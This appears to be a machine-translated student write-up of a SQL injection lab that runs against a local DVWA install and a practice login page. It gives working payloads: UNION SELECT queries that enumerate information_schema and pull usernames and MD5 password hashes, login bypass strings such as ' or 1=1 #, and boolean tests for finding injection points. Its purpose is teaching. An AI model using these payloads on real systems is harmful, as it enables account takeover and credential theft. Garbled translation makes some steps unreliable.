?? SQL injection attacks are passed into the Web application by constructing special inputs, which are mostly combinations of SQL syntax to execute an attacker's actions by executing SQL statements, and this chapter provides a SQL injection environment with LAMP, two experiments introducing SQL injection blasting database , SQL injection bypass validates two points of knowledge.
First, download the code to the lab building environment by following the commands below to learn from the reference comparison.
Second, the principle of experiment$ wget http://labfile.oss.aliyuncs.com/courses/876/dvwa.tar.gz$ wget http://labfile.oss.aliyuncs.com/courses/876/sql2.tar.gz
?? A SQL injection attack is one of the most commonly used means of hacking against a database by inserting a malicious SQL query or add statement into an application's input parameters, and then parsing the execution of an attack on a background SQL server.
Third, the WEB program three-tier architectureThe three-tier architecture (3-tier architecture) typically divides the entire business application into:
Interface Layer (User Interface layer)
Business Logic Layer
Data access layer.
?? The purpose of distinguishing hierarchy is to think of "high cohesion and low coupling". In the design of software architecture, layered structure is the most common and most important structure is applied to many types of software development.
?? The idea of a database-driven Web application that complies with the three-tier architecture is also divided into three tiers:
The presentation layer.
Business Logic layer (also called domain layer)
Data access layer (also known as storage layer)
The topology looks like this:
In, the user visits the lab Building home page to perform the following procedure:
In a three-tier architecture, all communication must go through the middle tier, and simply put, a three-tier architecture is a linear relationship.
Iv. SQL Injection Vulnerability 4.1 SQL injection causes and threats:Just now. When we visit a Dynamic Web page, the WEB server initiates a SQL query request to the data access layer and executes the SQL statement if permission validation passes.
The SQL requests sent directly from this site are generally not dangerous, but the reality is that it is often necessary to dynamically construct SQL statements in conjunction with the user's input data, and if the data entered by the user is constructed into malicious SQL code, the WEB application does not review the parameters used by the dynamically constructed SQL statement. Pose an unexpected risk.
The main threats to SQL injection are the following:
Next we pass an example that gives you a clearer understanding of how SQL injection guessing database is occurring.
As shown, download the file first and unzip the run:
shiyanlou:~/ $ wget http://labfile.oss.aliyuncs.com/courses/876/dvwa.tar.gz`shiyanlou:~/ $ tar -zxvf dvwa.tar.gzshiyanlou:~/ $ cd dvwashiyanlou:~/ $ sudo apt-get updateshiyanlou:~/ $ ./deploy.sh
After unpacking and running, go to the Firefox browser, enter the URL: localhost/dvwasql, click Create/reset Database to create databases. Enter the login interface, the default username is admin password password
Adjust the security level to Low:
Enter the SQL injection page to start the injection, enter 1 First, view the Echo (id=1 in the URL, explaining that the PHP page passed the parameters via the Get method):
What kind of SQL statement actually executes in the background? Click to view source View Source code:
As you can see, the actual execution of the SQL statement is:SELECT first_name, last_name FROM users WHERE user_id = ‘1‘;
If we don't have a common sense, like entering 1 ' ORDER by # in the input box
The actual executed SQL statement will become:
SELECT first_name, last_name FROM users WHERE user_id = ‘1‘ order by 1#`;(按照Mysql语法,#后面会被注释掉,使用这种方法屏蔽掉后面的单引号,避免语法错误)
The meaning of this statement is to query the users table for data user_id 1 and rank by the first field.
1‘ order by 1#both input and 1‘ order by 2# time return to normal:
When entering 1 ' ORDER by 3#, an error is returned:
As a figure, there are only two fields in the Users table and the data is two columns.
Next we continue to obtain information using the Union Select Union query.
The Union operator can combine query result collections of two or more two SELECT statements into a single result set, which is the execution of a federated query. Note that when you use union queries you need to have the same number of columns as the main query, and we've already learned that the number of main query columns is 2, and then it's good to do it.
Enter 1‘ union select database(),user()# to query:
SELECT first_name, last_name FROM users WHERE user_id = ‘1‘ union select database(),user()#;
`
By returning information, we successfully obtained:
Similarly we enter 1 ' Union select version (), @ @version_compile_os # to query:
The actual execution of the SQL statement is:
SELECT first_name, last_name FROM users WHERE user_id = ‘1‘ union select version(),@@version_compile_os#`;
By returning the information, we were able to obtain:
Next we try to get the table names in the DVWA database.
information_schemaIs a MySQL comes with a table, this data table holds the MySQL server all the database information, such as database name, database table, table column data type and access rights and so on. The database has a data table named tables that contains two fields table_name and table_schema records the database where the table name and table name are stored in the DBMS.
We enter 1‘ union select table_name,table_schema from information_schema.tables where table_schema= ‘dvwa‘# the query:
The actual execution of the SQL statement is:
SELECT first_name, last_name FROM users WHERE user_id = ‘1‘ union select table_name,table_schema from information_schema.tables where table_schema= ‘dvwa‘#`;
By returning the information, we get to:
Some students are certainly not satisfied with the current information, then we will try to obtain a heavyweight username, password.
By experience we can boldly guess the fields of the users table as user and password, so enter: 1‘ union select user,password from users# query:
The actual execution of the SQL statement is:
SELECT first_name, last_name FROM users WHERE user_id = ‘1‘ union select user,password from users#
You can see the successful burst user name, password, password using MD5 encryption, can be decrypted to www.cmd5.com.
Question: Here is a place not to understand, after the input command to query, how to see from this image password using MD5 encryption?
4.3 Sql injection instance two. Validation BypassNext we'll try another experiment that uses SQL vulnerabilities to bypass login validation.
As shown, download the file first and unzip the run:
shiyanlou:~/ $ wget http://labfile.oss.aliyuncs.com/courses/876/sql2.tar.gzshiyanlou:~/ $ tar -zxvf sql2.tar.gzshiyanlou:~/ $ cd sql2shiyanlou:~/ $ sudo apt-get update shiyanlou:~/ $ ./deploy.sh
? ? Firefox browser, enter the URL: localhost/sql2, in the order shown, the initialization of data:
After the preparation is completed, we go to the homepage to find this is a normal login page, just enter the correct user name and password to log in successfully.
Let's try entering username 123 and password 123 login:
We are unable to obtain any information from the error page.
See how the backend code is validated:
When actually performing the operation:
select * from users where username=‘123‘ and password=‘123‘
When a query to a datasheet exists that satisfies both the username and password fields, the login success is returned.
In the first experiment, we tried to enter # in the username 123‘ or 1=1 , and the password entered123‘ or 1=1 #
Why is it possible to login successfully? Because the actual execution of the statement is:select * from users where username=‘123‘ or 1=1 #‘ and password=‘123‘ or 1=1 #‘
Following the Mysql syntax, the content behind the # is ignored, so the above statement is equivalent (in fact the password box does not enter anything else):select * from users where username=‘123‘ or 1=1
Because the judgment statement or 1=1 is established, the result of course returns true, successfully logged in.
Let's try not to use # shielded single quotes, in a manual closing way:
We try to type in the username 123‘ or ‘1‘=‘1 , the password is also entered 123‘ or ‘1‘=‘1 (no single quotation marks are missing, otherwise there is a syntax error):
The actual execution of the SQL statement is:
select * from users where username=‘123‘ or ‘1‘=‘1‘ and password=‘123‘ or ‘1‘=‘1`
Two or statements make and before and after two judgments are always equal to true, so can successfully login.
V. Judging the SQL injection pointTypically, a Url that may have a SQL injection vulnerability is similar to this form: Http://xxx.xxx.xxx/abcd.php?id=XX
There are two main ways to judge SQL injection:
?? In a asp/php/jsp Dynamic Web page where there may be a SQL injection attack, there may be only one parameter in a Dynamic Web page, and sometimes multiple parameters. Sometimes an integer parameter, sometimes a string argument, cannot be generalize. In short, if it is a dynamic Web page with parameters and this page accesses the database, there is a possibility of Sql injection. If the programmer does not have sufficient security awareness and does not perform the necessary character filtering, there is a large likelihood of SQL injection.
5.1 To determine if there is a SQL injection vulnerabilityThe most classic single-quote method of judging:
Add a single quotation mark after the argument, such as:
http://xxx/abc.php?id=1‘
If the page returns an error, there is a SQL injection.
The reason for this is that the number of single quotes does not match, regardless of the character type or the integer type.
Note: If there is no error, it does not mean that there is no SQL injection, because it is possible for the page to filter single quotes, you can use a judgment statement to inject
5.2 To determine the type of SQL injection vulnerabilityThere are typically 2 types of SQL injection vulnerabilities:
?? In fact, all types are generated according to the type of table of the database itself, when we create the table will always have a data type restrictions, and different databases have different data types, but no matter how the common query data type is always distinguished by the number and character, so the injection point will produce the type.
5.2.1 Digital Type judgment:When the input parameter x is an integral type, the SQL statement type in abc.php is generally as follows:
select * from <表名> where id = x
This type can be judged using classic and 1=1 and and 1=2 :
The input page in the URL address is http://xxx/abc.php?id= x and 1=1 still working, proceed to the next step.
Continuing to enter http://xxx/abc.php?id= x and 1=2 a page run error in the URL address, this SQL injection is a digital injection.
The reasons are as follows:
When entered and 1=1 , the SQL statement is executed in the background:
select * from <表名> where id = x and 1=1
No syntax errors and logical judgments are correct, so return to normal.
When entered and 1=2 , the SQL statement is executed in the background:
select * from <表名> where id = x and 1=2
There is no syntax error but the logic is false, so the error is returned.
Let's use the assumption: if this is a character injection, we should have the following when we enter the above statement:
select * from <表名> where id = ‘x and 1=1‘ select * from <表名> where id = ‘x and 1=2‘
The query statement converts and statements all to a string, and does not have the logical judgment of and, so the above results do not appear, so the assumption is not tenable.
5.2.2 Character type judgment:When the input parameter x is a character type, typically the SQL statement type in abc.php is roughly the following:
select * from <表名> where id = ‘x‘
We can also use this type and ‘1‘=‘1 and ‘1‘=‘2 to judge:
Enter the page in the URL address to http://xxx/abc.php?id= x‘ and ‘1‘=‘1 run normally, proceed to the next step.
The URL address continues to enter the http://xxx/abc.php?id= x‘ and ‘1‘=‘2 page run error, which indicates that this SQL injection is a character-type injection.
The reasons are as follows:
When input and ' 1 ' = ' 1 o'clock, the background executes the SQL statement:
select * from <表名> where id = ‘x‘ and ‘1‘=‘1‘
The syntax is correct, the logic is correctly judged, so the return is correct.
When input and ' 1 ' = ' 2 o'clock, the background executes the SQL statement:
select * from <表名> where id = ‘x‘ and ‘1‘=‘2‘
The syntax is correct, but the logic is wrong, so it returns correctly.
Summarize:This "Introduction to the Fundamentals of SQL injection" experiment with two examples gives me a rough idea of SQL injection and the power of SQL injection. Common techniques for SQL injection include:
2017-2018-1 "Linux kernel Principles and design" 12th Week work
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
